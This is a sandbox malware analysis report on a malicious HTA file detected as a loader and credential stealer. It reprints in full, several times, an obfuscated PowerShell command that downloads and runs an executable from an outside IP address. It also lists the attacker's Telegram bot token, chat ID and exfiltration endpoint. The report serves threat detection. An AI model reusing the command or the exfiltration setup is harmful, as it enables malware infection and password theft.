Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mybestgirlfriendwalkingaroundtheworld.hta

Overview

General Information

Sample name:mybestgirlfriendwalkingaroundtheworld.hta
Analysis ID:1636658
MD5:ce2e5cf9073c55e909187a0d16b5dd2e
SHA1:dd26f331ca3da30ea8e4065ec6da02bf0469e124
SHA256:37657f99bb29fc5a5b2f2be621b0f17e619013cfe32a0b97c6e5c07e87699702
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Drops PE files with benign system names
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Powershell drops PE file
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Parents
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Suspicious command line found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Unusual Parent Process For Cmd.EXE
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7800 cmdline: mshta.exe "C:\Users\user\Desktop\mybestgirlfriendwalkingaroundtheworld.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7916 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7120 cmdline: PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 6340 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 6424 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES43E7.tmp" "c:\Users\user\AppData\Local\Temp\xzofjfee\CSC4F15B4BDA3DF43B881AE17521298E1BA.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • csrss.exe (PID: 1812 cmdline: "C:\Users\user\AppData\Roaming\csrss.exe" MD5: 1A3D4243CF435EC6034F3814551150ED)
          • cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\13.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1020 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\3185.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • dajivhqI.pif (PID: 7196 cmdline: C:\\Users\\user\\Links\dajivhqI.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM/sendMessage", "Telegram Stream": [{"ok": true, "result": {"message_id": 362, "from": {"id": 7653831104, "is_bot": true, "first_name": "kalidresult", "username": "Khalidresultobot"}, "chat": {"id": 6306897853, "first_name": "Enzo", "type": "private"}, "date": 1741825334, "document": {"file_name": "Userdata.txt", "mime_type": "text/plain", "file_id": "BQACAgQAAxkDAAIBamfSJTZJu-tPhGFrwOQsUq2Sx_JfAALTEgACQMeZUhbmbnkiTz5MNgQ", "file_unique_id": "AgAD0xIAAkDHmVI", "file_size": 881}, "caption": "user / Passwords /"}}]}
{"EXfil Mode": "Telegram", "Telegram Token": "7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM", "Telegram Chatid": "6306897853"}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.1358823987.000000000247E000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
      00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
          00000010.00000002.2494926367.0000000028510000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 39 entries
            SourceRuleDescriptionAuthorStrings
            16.2.dajivhqI.pif.46b268.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x700:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1e9d0:$s5: delete[]
            • 0x1de88:$s6: constructor or from DllMain.
            16.1.dajivhqI.pif.438038.2.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x2f2b0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x2f930:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x1d98a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1d5d0:$s5: delete[]
            • 0x1ca88:$s6: constructor or from DllMain.
            16.2.dajivhqI.pif.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x700:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1e9d0:$s5: delete[]
            • 0x1de88:$s6: constructor or from DllMain.
            16.2.dajivhqI.pif.2993e390.7.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
              16.2.dajivhqI.pif.2993e390.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 137 entries
                SourceRuleDescriptionAuthorStrings
                amsi32_7120.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                  System Summary

                  barindex
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\csrss.exe, ProcessId: 1812, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7120, TargetFilename: C:\Users\user\AppData\Roaming\csrss.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICA
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\13.cmd"", CommandLine: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\13.cmd"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ParentImage: C:\Users\user\AppData\Roaming\csrss.exe, ParentProcessId: 1812, ParentProcessName: csrss.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\13.cmd"", ProcessId: 7772, ProcessName: cmd.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\csrss.exe, NewProcessName: C:\Users\user\AppData\Roaming\csrss.exe, OriginalFileName: C:\Users\user\AppData\Roaming\csrss.exe, ParentCommandLine: PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7120, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ProcessId: 1812, ProcessName: csrss.exe
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\csrss.exe, ProcessId: 1812, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7120, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.cmdline", ProcessId: 6340, ProcessName: csc.exe
